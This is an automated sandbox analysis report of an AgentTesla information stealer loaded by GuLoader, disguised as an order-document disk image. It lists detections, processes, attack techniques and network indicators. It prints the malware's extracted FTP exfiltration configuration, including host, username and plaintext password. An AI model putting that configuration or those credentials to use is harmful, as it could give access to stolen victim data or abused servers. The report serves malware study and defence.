Windows
Analysis Report
Objedn#U00e1vka_20248481119000903.img
Overview
General Information
Sample name: | Objedn#U00e1vka_20248481119000903.imgrenamed because original name is a hash value |
Original sample name: | Objednvka_20248481119000903.img |
Analysis ID: | 1566525 |
MD5: | 8b2f7394817f048cb466ad9046458f3a |
SHA1: | af12cb22f90f8ba4b84b7c8a2d691f66a800fc0f |
SHA256: | f65bcb980c5bf774ba123d8cdede4a455e766c0b1935f3e0c892608fdc6f19b0 |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 7212 cmdline:
C:\Windows \system32\ cmd.exe /c powershel l.exe -ex bypass -co mmand Moun t-DiskImag e -ImagePa th (gc C:\ Windows\pa th.txt) > tmp.log 2> &1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7256 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7300 cmdline:
powershell .exe -ex b ypass -com mand Mount -DiskImage -ImagePat h (gc C:\W indows\pat h.txt) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- Objedn vka_20248481119000903.exe (PID: 7532 cmdline:
"E:\Objedn vka_20248 4811190009 03.exe" MD5: FFC86DFE93F81BCE26A2B4D2D818B167) - Objedn vka_20248481119000903.exe (PID: 7856 cmdline:
"E:\Objedn vka_20248 4811190009 03.exe" MD5: FFC86DFE93F81BCE26A2B4D2D818B167)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-02T11:36:18.961506+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 86.107.36.93 | 21 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-02T11:36:20.106119+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 86.107.36.93 | 35334 | TCP |
2024-12-02T11:36:20.226620+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 86.107.36.93 | 35334 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-02T11:36:11.831801+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49736 | 185.33.55.26 | 80 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Integrated Neural Analysis Model: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | Suricata IDS: |
Source: | FTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | File created: | Jump to dropped file |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static file information: |
Data Obfuscation |
---|
Source: | File source: | ||
Source: | File source: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | API/Special instruction interceptor: | ||
Source: | API/Special instruction interceptor: |
Source: | RDTSC instruction interceptor: | ||
Source: | RDTSC instruction interceptor: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 311 Security Software Discovery | Remote Services | 1 Email Collection | 1 Non-Standard Port | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Credentials in Registry | 1 Process Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 141 Virtualization/Sandbox Evasion | Security Account Manager | 141 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 22 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 224 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
ftp.carbognin.it | 86.107.36.93 | true | true | unknown | |
akonnyuszerkezet.hu | 185.33.55.26 | true | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.33.55.26 | akonnyuszerkezet.hu | Hungary | 47381 | SERVERGARDEN-ASServergardenKftHU | false | |
86.107.36.93 | ftp.carbognin.it | Romania | 6910 | DIALTELECOMRO | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1566525 |
Start date and time: | 2024-12-02 11:34:35 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 53s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 9 |
Number of new started drivers analysed: | 2 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Objedn#U00e1vka_20248481119000903.imgrenamed because original name is a hash value |
Original Sample Name: | Objednvka_20248481119000903.img |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winIMG@7/15@2/2 |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, vhdmp.sys, WMIADAP.exe, SIHClient.exe, conhost.exe, fsdepends.sys
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: Objedn#U00e1vka_20248481119000903.img
Time | Type | Description |
---|---|---|
05:35:22 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
185.33.55.26 | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
86.107.36.93 | Get hash | malicious | AgentTesla | Browse | ||
Get hash | malicious | AgentTesla, GuLoader | Browse | |||
Get hash | malicious | AgentTesla, GuLoader | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse | |||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
ftp.carbognin.it | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
| ||
Get hash | malicious | AgentTesla, DarkTortilla | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
DIALTELECOMRO | Get hash | malicious | Mirai, Okiru | Browse |
| |
